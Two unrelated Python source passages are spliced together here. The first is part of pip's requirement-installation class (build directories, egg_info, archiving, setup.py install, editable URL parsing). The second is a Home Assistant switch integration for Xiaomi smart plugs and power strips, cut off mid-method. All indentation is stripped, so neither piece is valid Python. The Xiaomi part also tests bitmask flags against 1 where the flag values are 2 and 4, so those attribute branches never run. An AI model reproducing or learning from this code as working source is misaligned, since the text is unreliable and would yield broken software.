logger.debug('Using cached wheel link: %s', self.link)
@property
def specifier(self):
return self.req.specifier
@property
def is_pinned(self):
"""Return whether I am pinned to an exact version.
For example, some-package==1.2 is pinned; some-package>1.2 is not.
"""
specifiers = self.specifier
return (len(specifiers) == 1 and
next(iter(specifiers)).operator in {'==', '==='})
def from_path(self):
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir):
assert build_dir is not None
if self._temp_build_dir.path is not None:
return self._temp_build_dir.path
if self.req is None:
# for requirement via a path to a directory: the name of the
# package is not available yet so we create a temp directory
# Once run_egg_info will have run, we'll be able
# to fix it via _correct_build_location
# Some systems have /tmp as a symlink which confuses custom
# builds (such as numpy). Thus, we ensure that the real path
# is returned.
self._temp_build_dir.create()
self._ideal_build_dir = build_dir
return self._temp_build_dir.path
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
logger.debug('Creating directory %s', build_dir)
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
def _correct_build_location(self):
"""Move self._temp_build_dir to self._ideal_build_dir/self.req.name
For some requirements (e.g. a path to a directory), the name of the
package is not available until we run egg_info, so the build_location
will return a temporary directory and store the _ideal_build_dir.
This is only called by self.egg_info_path to fix the temporary build
directory.
"""
if self.source_dir is not None:
return
assert self.req is not None
assert self._temp_build_dir.path
assert self._ideal_build_dir.path
old_location = self._temp_build_dir.path
self._temp_build_dir.path = None
new_location = self.build_location(self._ideal_build_dir)
if os.path.exists(new_location):
raise InstallationError(
'A package already exists in %s; please remove it to continue'
% display_path(new_location))
logger.debug(
'Moving package %s from %s to new location %s',
self, display_path(old_location), display_path(new_location),
)
shutil.move(old_location, new_location)
self._temp_build_dir.path = new_location
self._ideal_build_dir = None
self.source_dir = os.path.normpath(os.path.abspath(new_location))
self._egg_info_path = None
@property
def name(self):
if self.req is None:
return None
return native_str(pkg_resources.safe_name(self.req.name))
@property
def setup_py_dir(self):
return os.path.join(
self.source_dir,
self.link and self.link.subdirectory_fragment or '')
@property
def setup_py(self):
assert self.source_dir, "No source dir for %s" % self
cmd = [sys.executable, '-c', 'import setuptools']
output = call_subprocess(
cmd,
show_stdout=False,
command_desc='python -c "import setuptools"',
on_returncode='ignore',
)
if output:
if get_installed_version('setuptools') is None:
add_msg = "Please install setuptools."
else:
add_msg = output
# Setuptools is not available
raise InstallationError(
"Could not import setuptools which is required to "
"install from a source distribution.\n%s" % add_msg
)
setup_py = os.path.join(self.setup_py_dir, 'setup.py')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
@property
def pyproject_toml(self):
assert self.source_dir, "No source dir for %s" % self
pp_toml = os.path.join(self.setup_py_dir, 'pyproject.toml')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(pp_toml, six.text_type):
pp_toml = pp_toml.encode(sys.getfilesystemencoding())
return pp_toml
def get_pep_518_info(self):
"""Get a list of the packages required to build the project, if any,
and a flag indicating whether pyproject.toml is present, indicating
that the build should be isolated.
Build requirements can be specified in a pyproject.toml, as described
in PEP 518. If this file exists but doesn't specify build
requirements, pip will default to installing setuptools and wheel.
"""
if os.path.isfile(self.pyproject_toml):
with open(self.pyproject_toml) as f:
pp_toml = pytoml.load(f)
build_sys = pp_toml.get('build-system', {})
return (build_sys.get('requires', ['setuptools', 'wheel']), True)
return (['setuptools', 'wheel'], False)
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.debug(
'Running setup.py (path:%s) egg_info for package %s',
self.setup_py, self.name,
)
else:
logger.debug(
'Running setup.py (path:%s) egg_info for package from %s',
self.setup_py, self.link,
)
with indent_log():
script = SETUPTOOLS_SHIM % self.setup_py
base_cmd = [sys.executable, '-c', script]
if self.isolated:
base_cmd += ["--no-user-cfg"]
egg_info_cmd = base_cmd + ['egg_info']
# We can't put the .egg-info files at the root, because then the
# source code will be mistaken for an installed egg, causing
# problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.setup_py_dir, 'pip-egg-info')
ensure_dir(egg_info_dir)
egg_base_option = ['--egg-base', 'pip-egg-info']
call_subprocess(
egg_info_cmd + egg_base_option,
cwd=self.setup_py_dir,
show_stdout=False,
command_desc='python setup.py egg_info')
if not self.req:
if isinstance(parse_version(self.pkg_info()["Version"]), Version):
op = "=="
else:
op = "==="
self.req = Requirement(
"".join([
self.pkg_info()["Name"],
op,
self.pkg_info()["Version"],
])
)
self._correct_build_location()
else:
metadata_name = canonicalize_name(self.pkg_info()["Name"])
if canonicalize_name(self.req.name) != metadata_name:
logger.warning(
'Running setup.py (path:%s) egg_info for package %s '
'produced metadata for project name %s. Fix your '
'#egg=%s fragments.',
self.setup_py, self.name, metadata_name, self.name
)
self.req = Requirement(metadata_name)
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.setup_py_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.lexists(
os.path.join(root, dir, 'bin', 'python')
) or
os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
'No files/directories in %s (from %s)' % (base, filename)
)
assert filenames, \
"No files/directories in %s (from %s)" % (base, filename)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep) +
(os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warning(
'No PKG-INFO file found in %s',
display_path(self.egg_info_path('PKG-INFO')),
)
p.feed(data or '')
return p.close()
_requirements_section_re = re.compile(r'\[(.*?)\]')
@property
def installed_version(self):
return get_installed_version(self.name)
def assert_source_matches_version(self):
assert self.source_dir
version = self.pkg_info()['version']
if self.req.specifier and version not in self.req.specifier:
logger.warning(
'Requested %s, but installing version %s',
self,
version,
)
else:
logger.debug(
'Source in %s has version %s, which satisfies requirement %s',
display_path(self.source_dir),
version,
self,
)
def update_editable(self, obtain=True):
if not self.link:
logger.debug(
"Cannot update repository at %s; repository location is "
"unknown",
self.source_dir,
)
return
assert self.editable
assert self.source_dir
if self.link.scheme == 'file':
# Static paths don't get updated
return
assert '+' in self.link.url, "bad url: %r" % self.link.url
if not self.update:
return
vc_type, url = self.link.url.split('+', 1)
backend = vcs.get_backend(vc_type)
if backend:
vcs_backend = backend(self.link.url)
if obtain:
vcs_backend.obtain(self.source_dir)
else:
vcs_backend.export(self.source_dir)
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.link, vc_type))
def uninstall(self, auto_confirm=False, verbose=False,
use_user_site=False):
"""
Uninstall the distribution currently satisfying this requirement.
Prompts before removing or modifying files unless
``auto_confirm`` is True.
Refuses to delete or modify files outside of ``sys.prefix`` -
thus uninstallation within a virtual environment can only
modify that virtual environment, even if the virtualenv is
linked to global site-packages.
"""
if not self.check_if_exists(use_user_site):
logger.warning("Skipping %s as it is not installed.", self.name)
return
dist = self.satisfied_by or self.conflicts_with
uninstalled_pathset = UninstallPathSet.from_dist(dist)
uninstalled_pathset.remove(auto_confirm, verbose)
return uninstalled_pathset
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.pkg_info()["version"])
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup, (a)bort ' %
display_path(archive_path), ('i', 'w', 'b', 'a'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warning('Deleting %s', display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warning(
'Backing up %s to %s',
display_path(archive_path),
display_path(dest_file),
)
shutil.move(archive_path, dest_file)
elif response == 'a':
sys.exit(-1)
if create_archive:
zip = zipfile.ZipFile(
archive_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True
)
dir = os.path.normcase(os.path.abspath(self.setup_py_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.info('Saved %s', display_path(archive_path))
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
def match_markers(self, extras_requested=None):
if not extras_requested:
# Provide an extra to safely evaluate the markers
# without matching any extra
extras_requested = ('',)
if self.markers is not None:
return any(
self.markers.evaluate({'extra': extra})
for extra in extras_requested)
else:
return True
def install(self, install_options, global_options=None, root=None,
home=None, prefix=None, warn_script_location=True,
use_user_site=False, pycompile=True):
global_options = global_options if global_options is not None else []
if self.editable:
self.install_editable(
install_options, global_options, prefix=prefix,
)
return
if self.is_wheel:
version = wheel.wheel_version(self.source_dir)
wheel.check_compatibility(version, self.name)
self.move_wheel_files(
self.source_dir, root=root, prefix=prefix, home=home,
warn_script_location=warn_script_location,
use_user_site=use_user_site, pycompile=pycompile,
)
self.install_succeeded = True
return
# Extend the list of global and install options passed on to
# the setup.py call with the ones from the requirements file.
# Options specified in requirements file override those
# specified on the command line, since the last option given
# to setup.py is the one that is used.
global_options = list(global_options) + \
self.options.get('global_options', [])
install_options = list(install_options) + \
self.options.get('install_options', [])
if self.isolated:
global_options = global_options + ["--no-user-cfg"]
with TempDirectory(kind="record") as temp_dir:
record_filename = os.path.join(temp_dir.path, 'install-record.txt')
install_args = self.get_install_args(
global_options, record_filename, root, prefix, pycompile,
)
msg = 'Running setup.py install for %s' % (self.name,)
with open_spinner(msg) as spinner:
with indent_log():
call_subprocess(
install_args + install_options,
cwd=self.setup_py_dir,
show_stdout=False,
spinner=spinner,
)
if not os.path.exists(record_filename):
logger.debug('Record file %s not found', record_filename)
return
self.install_succeeded = True
def prepend_root(path):
if root is None or not os.path.isabs(path):
return path
else:
return change_root(root, path)
with open(record_filename) as f:
for line in f:
directory = os.path.dirname(line)
if directory.endswith('.egg-info'):
egg_info_dir = prepend_root(directory)
break
else:
logger.warning(
'Could not find .egg-info directory in install record'
' for %s',
self,
)
# FIXME: put the record somewhere
# FIXME: should this be an error?
return
new_lines = []
with open(record_filename) as f:
for line in f:
filename = line.strip()
if os.path.isdir(filename):
filename += os.path.sep
new_lines.append(
os.path.relpath(prepend_root(filename), egg_info_dir)
)
new_lines.sort()
ensure_dir(egg_info_dir)
inst_files_path = os.path.join(egg_info_dir, 'installed-files.txt')
with open(inst_files_path, 'w') as f:
f.write('\n'.join(new_lines) + '\n')
def ensure_has_source_dir(self, parent_dir):
"""Ensure that a source_dir is set.
This will create a temporary build dir if the name of the requirement
isn't known yet.
:param parent_dir: The ideal pip parent_dir for the source_dir.
Generally src_dir for editables and build_dir for sdists.
:return: self.source_dir
"""
if self.source_dir is None:
self.source_dir = self.build_location(parent_dir)
return self.source_dir
def get_install_args(self, global_options, record_filename, root, prefix,
pycompile):
install_args = [sys.executable, "-u"]
install_args.append('-c')
install_args.append(SETUPTOOLS_SHIM % self.setup_py)
install_args += list(global_options) + \
['install', '--record', record_filename]
install_args += ['--single-version-externally-managed']
if root is not None:
install_args += ['--root', root]
if prefix is not None:
install_args += ['--prefix', prefix]
if pycompile:
install_args += ["--compile"]
else:
install_args += ["--no-compile"]
if running_under_virtualenv():
py_ver_str = 'python' + sysconfig.get_python_version()
install_args += ['--install-headers',
os.path.join(sys.prefix, 'include', 'site',
py_ver_str, self.name)]
return install_args
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if self.source_dir and os.path.exists(
os.path.join(self.source_dir, PIP_DELETE_MARKER_FILENAME)):
logger.debug('Removing source in %s', self.source_dir)
rmtree(self.source_dir)
self.source_dir = None
self._temp_build_dir.cleanup()
self.build_env.cleanup()
def install_editable(self, install_options,
global_options=(), prefix=None):
logger.info('Running setup.py develop for %s', self.name)
if self.isolated:
global_options = list(global_options) + ["--no-user-cfg"]
if prefix:
prefix_param = ['--prefix={}'.format(prefix)]
install_options = list(install_options) + prefix_param
with indent_log():
# FIXME: should we do --install-headers here too?
with self.build_env:
call_subprocess(
[
sys.executable,
'-c',
SETUPTOOLS_SHIM % self.setup_py
] +
list(global_options) +
['develop', '--no-deps'] +
list(install_options),
cwd=self.setup_py_dir,
show_stdout=False,
)
self.install_succeeded = True
def check_if_exists(self, use_user_site):
"""Find an installed distribution that satisfies or conflicts
with this requirement, and set self.satisfied_by or
self.conflicts_with appropriately.
"""
if self.req is None:
return False
try:
# get_distribution() will resolve the entire list of requirements
# anyway, and we've already determined that we need the requirement
# in question, so strip the marker so that we don't try to
# evaluate it.
no_marker = Requirement(str(self.req))
no_marker.marker = None
self.satisfied_by = pkg_resources.get_distribution(str(no_marker))
if self.editable and self.satisfied_by:
self.conflicts_with = self.satisfied_by
# when installing editables, nothing pre-existing should ever
# satisfy
self.satisfied_by = None
return True
except pkg_resources.DistributionNotFound:
return False
except pkg_resources.VersionConflict:
existing_dist = pkg_resources.get_distribution(
self.req.name
)
if use_user_site:
if dist_in_usersite(existing_dist):
self.conflicts_with = existing_dist
elif (running_under_virtualenv() and
dist_in_site_packages(existing_dist)):
raise InstallationError(
"Will not install to the user site because it will "
"lack sys.path precedence to %s in %s" %
(existing_dist.project_name, existing_dist.location)
)
else:
self.conflicts_with = existing_dist
return True
@property
def is_wheel(self):
return self.link and self.link.is_wheel
def move_wheel_files(self, wheeldir, root=None, home=None, prefix=None,
warn_script_location=True, use_user_site=False,
pycompile=True):
move_wheel_files(
self.name, self.req, wheeldir,
user=use_user_site,
home=home,
root=root,
prefix=prefix,
pycompile=pycompile,
isolated=self.isolated,
warn_script_location=warn_script_location,
)
def get_dist(self):
"""Return a pkg_resources.Distribution built from self.egg_info_path"""
egg_info = self.egg_info_path('').rstrip(os.path.sep)
base_dir = os.path.dirname(egg_info)
metadata = pkg_resources.PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
return pkg_resources.Distribution(
os.path.dirname(egg_info),
project_name=dist_name,
metadata=metadata,
)
@property
def has_hash_options(self):
"""Return whether any known-good hashes are specified as options.
These activate --require-hashes mode; hashes specified as part of a
URL do not.
"""
return bool(self.options.get('hashes', {}))
def hashes(self, trust_internet=True):
"""Return a hash-comparer that considers my option- and URL-based
hashes to be known-good.
Hashes in URLs--ones embedded in the requirements file, not ones
downloaded from an index server--are almost peers with ones from
flags. They satisfy --require-hashes (whether it was implicitly or
explicitly activated) but do not activate it. md5 and sha224 are not
allowed in flags, which should nudge people toward good algos. We
always OR all hashes together, even ones from URLs.
:param trust_internet: Whether to trust URL-based (#md5=...) hashes
downloaded from the internet, as by populate_link()
"""
good_hashes = self.options.get('hashes', {}).copy()
link = self.link if trust_internet else self.original_link
if link and link.hash:
good_hashes.setdefault(link.hash_name, []).append(link.hash)
return Hashes(good_hashes)
def _strip_postfix(req):
"""
Strip req postfix ( -dev, 0.2, etc )
"""
# FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)$', req)
if match:
# Strip off -dev, -0.2, etc.
warnings.warn(
"#egg cleanup for editable urls will be dropped in the future",
RemovedInPip11Warning,
)
req = match.group(1)
return req
def parse_editable(editable_req):
"""Parses an editable requirement into:
- a requirement name
- an URL
- extras
- editable options
Accepted requirements:
svn+http://blahblah@rev#egg=Foobar[baz]&subdirectory=version_subdir
.[some_extra]
"""
from pip._internal.index import Link
url = editable_req
# If a file path is specified with extras, strip off the extras.
url_no_extras, extras = _strip_extras(url)
if os.path.isdir(url_no_extras):
if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not found." %
url_no_extras
)
# Treating it as code that has already been checked out
url_no_extras = path_to_url(url_no_extras)
if url_no_extras.lower().startswith('file:'):
package_name = Link(url_no_extras).egg_fragment
if extras:
return (
package_name,
url_no_extras,
Requirement("placeholder" + extras.lower()).extras,
)
else:
return package_name, url_no_extras, None
for version_control in vcs:
if url.lower().startswith('%s:' % version_control):
url = '%s+%s' % (version_control, url)
break
if '+' not in url:
raise InstallationError(
'%s should either be a path to a local project or a VCS url '
'beginning with svn+, git+, hg+, or bzr+' %
editable_req
)
vc_type = url.split('+', 1)[0].lower()
if not vcs.get_backend(vc_type):
error_message = 'For --editable=%s only ' % editable_req + \
', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
' is currently supported'
raise InstallationError(error_message)
package_name = Link(url).egg_fragment
if not package_name:
raise InstallationError(
"Could not detect requirement name for '%s', please specify one "
"with #egg=your_package_name" % editable_req
)
return _strip_postfix(package_name), url, None
def deduce_helpful_msg(req):
"""Returns helpful msg in case requirements file does not exist,
or cannot be parsed.
:params req: Requirements file path
"""
msg = ""
if os.path.exists(req):
msg = " It does exist."
# Try to parse and check if it is a requirements file.
try:
with open(req, 'r') as fp:
# parse first line only
next(parse_requirements(fp.read()))
msg += " The argument you provided " + \
"(%s) appears to be a" % (req) + \
" requirements file. If that is the" + \
" case, use the '-r' flag to install" + \
" the packages specified within it."
except RequirementParseError:
logger.debug("Cannot parse '%s' as requirements \
file" % (req), exc_info=1)
else:
msg += " File '%s' does not exist." % (req)
return msg
|
the-stack_106_12949
|
"""Support for Xiaomi Smart WiFi Socket and Smart Power Strip."""
import asyncio
from functools import partial
import logging
from miio import AirConditioningCompanionV3, ChuangmiPlug, DeviceException, PowerStrip
from miio.powerstrip import PowerMode
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_MODE,
CONF_HOST,
CONF_NAME,
CONF_TOKEN,
)
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_DEVICE,
CONF_FLOW_TYPE,
CONF_MODEL,
DOMAIN,
SERVICE_SET_POWER_MODE,
SERVICE_SET_POWER_PRICE,
SERVICE_SET_WIFI_LED_OFF,
SERVICE_SET_WIFI_LED_ON,
)
from .device import XiaomiMiioEntity
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Xiaomi Miio Switch"
DATA_KEY = "switch.xiaomi_miio"
MODEL_POWER_STRIP_V2 = "zimi.powerstrip.v2"
MODEL_PLUG_V3 = "chuangmi.plug.v3"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_MODEL): vol.In(
[
"chuangmi.plug.v1",
"qmi.powerstrip.v1",
"zimi.powerstrip.v2",
"chuangmi.plug.m1",
"chuangmi.plug.m3",
"chuangmi.plug.v2",
"chuangmi.plug.v3",
"chuangmi.plug.hmi205",
"chuangmi.plug.hmi206",
"chuangmi.plug.hmi208",
"lumi.acpartner.v3",
]
),
}
)
ATTR_POWER = "power"
ATTR_TEMPERATURE = "temperature"
ATTR_LOAD_POWER = "load_power"
ATTR_MODEL = "model"
ATTR_POWER_MODE = "power_mode"
ATTR_WIFI_LED = "wifi_led"
ATTR_POWER_PRICE = "power_price"
ATTR_PRICE = "price"
SUCCESS = ["ok"]
FEATURE_SET_POWER_MODE = 1
FEATURE_SET_WIFI_LED = 2
FEATURE_SET_POWER_PRICE = 4
FEATURE_FLAGS_GENERIC = 0
FEATURE_FLAGS_POWER_STRIP_V1 = (
FEATURE_SET_POWER_MODE | FEATURE_SET_WIFI_LED | FEATURE_SET_POWER_PRICE
)
FEATURE_FLAGS_POWER_STRIP_V2 = FEATURE_SET_WIFI_LED | FEATURE_SET_POWER_PRICE
FEATURE_FLAGS_PLUG_V3 = FEATURE_SET_WIFI_LED
SERVICE_SCHEMA = vol.Schema({vol.Optional(ATTR_ENTITY_ID): cv.entity_ids})
SERVICE_SCHEMA_POWER_MODE = SERVICE_SCHEMA.extend(
{vol.Required(ATTR_MODE): vol.All(vol.In(["green", "normal"]))}
)
SERVICE_SCHEMA_POWER_PRICE = SERVICE_SCHEMA.extend(
{vol.Required(ATTR_PRICE): cv.positive_float}
)
SERVICE_TO_METHOD = {
SERVICE_SET_WIFI_LED_ON: {"method": "async_set_wifi_led_on"},
SERVICE_SET_WIFI_LED_OFF: {"method": "async_set_wifi_led_off"},
SERVICE_SET_POWER_MODE: {
"method": "async_set_power_mode",
"schema": SERVICE_SCHEMA_POWER_MODE,
},
SERVICE_SET_POWER_PRICE: {
"method": "async_set_power_price",
"schema": SERVICE_SCHEMA_POWER_PRICE,
},
}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import Miio configuration from YAML."""
_LOGGER.warning(
"Loading Xiaomi Miio Switch via platform setup is deprecated. Please remove it from your configuration."
)
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config,
)
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the switch from a config entry."""
entities = []
if config_entry.data[CONF_FLOW_TYPE] == CONF_DEVICE:
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
host = config_entry.data[CONF_HOST]
token = config_entry.data[CONF_TOKEN]
name = config_entry.title
model = config_entry.data[CONF_MODEL]
unique_id = config_entry.unique_id
_LOGGER.debug("Initializing with host %s (token %s...)", host, token[:5])
if model in ["chuangmi.plug.v1", "chuangmi.plug.v3", "chuangmi.plug.hmi208"]:
plug = ChuangmiPlug(host, token, model=model)
# The device has two switchable channels (mains and a USB port).
# A switch device per channel will be created.
for channel_usb in [True, False]:
if channel_usb:
unique_id_ch = f"{unique_id}-USB"
else:
unique_id_ch = f"{unique_id}-mains"
device = ChuangMiPlugSwitch(
name, plug, config_entry, unique_id_ch, channel_usb
)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in ["qmi.powerstrip.v1", "zimi.powerstrip.v2"]:
plug = PowerStrip(host, token, model=model)
device = XiaomiPowerStripSwitch(name, plug, config_entry, unique_id)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in [
"chuangmi.plug.m1",
"chuangmi.plug.m3",
"chuangmi.plug.v2",
"chuangmi.plug.hmi205",
"chuangmi.plug.hmi206",
]:
plug = ChuangmiPlug(host, token, model=model)
device = XiaomiPlugGenericSwitch(name, plug, config_entry, unique_id)
entities.append(device)
hass.data[DATA_KEY][host] = device
elif model in ["lumi.acpartner.v3"]:
plug = AirConditioningCompanionV3(host, token)
device = XiaomiAirConditioningCompanionSwitch(
name, plug, config_entry, unique_id
)
entities.append(device)
hass.data[DATA_KEY][host] = device
else:
_LOGGER.error(
"Unsupported device found! Please create an issue at "
"https://github.com/rytilahti/python-miio/issues "
"and provide the following data: %s",
model,
)
async def async_service_handler(service):
"""Map services to methods on XiaomiPlugGenericSwitch."""
method = SERVICE_TO_METHOD.get(service.service)
params = {
key: value
for key, value in service.data.items()
if key != ATTR_ENTITY_ID
}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
devices = [
device
for device in hass.data[DATA_KEY].values()
if device.entity_id in entity_ids
]
else:
devices = hass.data[DATA_KEY].values()
update_tasks = []
for device in devices:
if not hasattr(device, method["method"]):
continue
await getattr(device, method["method"])(**params)
update_tasks.append(device.async_update_ha_state(True))
if update_tasks:
await asyncio.wait(update_tasks)
for plug_service in SERVICE_TO_METHOD:
schema = SERVICE_TO_METHOD[plug_service].get("schema", SERVICE_SCHEMA)
hass.services.async_register(
DOMAIN, plug_service, async_service_handler, schema=schema
)
async_add_entities(entities, update_before_add=True)
class XiaomiPlugGenericSwitch(XiaomiMiioEntity, SwitchEntity):
"""Representation of a Xiaomi Plug Generic."""
def __init__(self, name, device, entry, unique_id):
"""Initialize the plug switch."""
super().__init__(name, device, entry, unique_id)
self._icon = "mdi:power-socket"
self._available = False
self._state = None
self._state_attrs = {ATTR_TEMPERATURE: None, ATTR_MODEL: self._model}
self._device_features = FEATURE_FLAGS_GENERIC
self._skip_update = False
@property
def icon(self):
"""Return the icon to use for device if any."""
return self._icon
@property
def available(self):
"""Return true when state is known."""
return self._available
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
return self._state_attrs
@property
def is_on(self):
"""Return true if switch is on."""
return self._state
async def _try_command(self, mask_error, func, *args, **kwargs):
"""Call a plug command handling error messages."""
try:
result = await self.hass.async_add_executor_job(
partial(func, *args, **kwargs)
)
_LOGGER.debug("Response received from plug: %s", result)
# The Chuangmi Plug V3 returns 0 on success on usb_on/usb_off.
if func in ["usb_on", "usb_off"] and result == 0:
return True
return result == SUCCESS
except DeviceException as exc:
if self._available:
_LOGGER.error(mask_error, exc)
self._available = False
return False
async def async_turn_on(self, **kwargs):
"""Turn the plug on."""
result = await self._try_command("Turning the plug on failed", self._device.on)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn the plug off."""
result = await self._try_command(
"Turning the plug off failed", self._device.off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.is_on
self._state_attrs[ATTR_TEMPERATURE] = state.temperature
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
async def async_set_wifi_led_on(self):
"""Turn the wifi led on."""
if self._device_features & FEATURE_SET_WIFI_LED == 0:
return
await self._try_command(
"Turning the wifi led on failed", self._device.set_wifi_led, True
)
async def async_set_wifi_led_off(self):
"""Turn the wifi led on."""
if self._device_features & FEATURE_SET_WIFI_LED == 0:
return
await self._try_command(
"Turning the wifi led off failed", self._device.set_wifi_led, False
)
async def async_set_power_price(self, price: int):
"""Set the power price."""
if self._device_features & FEATURE_SET_POWER_PRICE == 0:
return
await self._try_command(
"Setting the power price of the power strip failed",
self._device.set_power_price,
price,
)
class XiaomiPowerStripSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Xiaomi Power Strip."""
def __init__(self, name, plug, model, unique_id):
"""Initialize the plug switch."""
super().__init__(name, plug, model, unique_id)
if self._model == MODEL_POWER_STRIP_V2:
self._device_features = FEATURE_FLAGS_POWER_STRIP_V2
else:
self._device_features = FEATURE_FLAGS_POWER_STRIP_V1
self._state_attrs[ATTR_LOAD_POWER] = None
if self._device_features & FEATURE_SET_POWER_MODE == 1:
self._state_attrs[ATTR_POWER_MODE] = None
if self._device_features & FEATURE_SET_WIFI_LED == 1:
self._state_attrs[ATTR_WIFI_LED] = None
if self._device_features & FEATURE_SET_POWER_PRICE == 1:
self._state_attrs[ATTR_POWER_PRICE] = None
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.is_on
self._state_attrs.update(
{ATTR_TEMPERATURE: state.temperature, ATTR_LOAD_POWER: state.load_power}
)
if self._device_features & FEATURE_SET_POWER_MODE == 1 and state.mode:
self._state_attrs[ATTR_POWER_MODE] = state.mode.value
if self._device_features & FEATURE_SET_WIFI_LED == 1 and state.wifi_led:
self._state_attrs[ATTR_WIFI_LED] = state.wifi_led
if (
self._device_features & FEATURE_SET_POWER_PRICE == 1
and state.power_price
):
self._state_attrs[ATTR_POWER_PRICE] = state.power_price
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
async def async_set_power_mode(self, mode: str):
"""Set the power mode."""
if self._device_features & FEATURE_SET_POWER_MODE == 0:
return
await self._try_command(
"Setting the power mode of the power strip failed",
self._device.set_power_mode,
PowerMode(mode),
)
class ChuangMiPlugSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Chuang Mi Plug V1 and V3."""
def __init__(self, name, plug, entry, unique_id, channel_usb):
"""Initialize the plug switch."""
name = f"{name} USB" if channel_usb else name
if unique_id is not None and channel_usb:
unique_id = f"{unique_id}-usb"
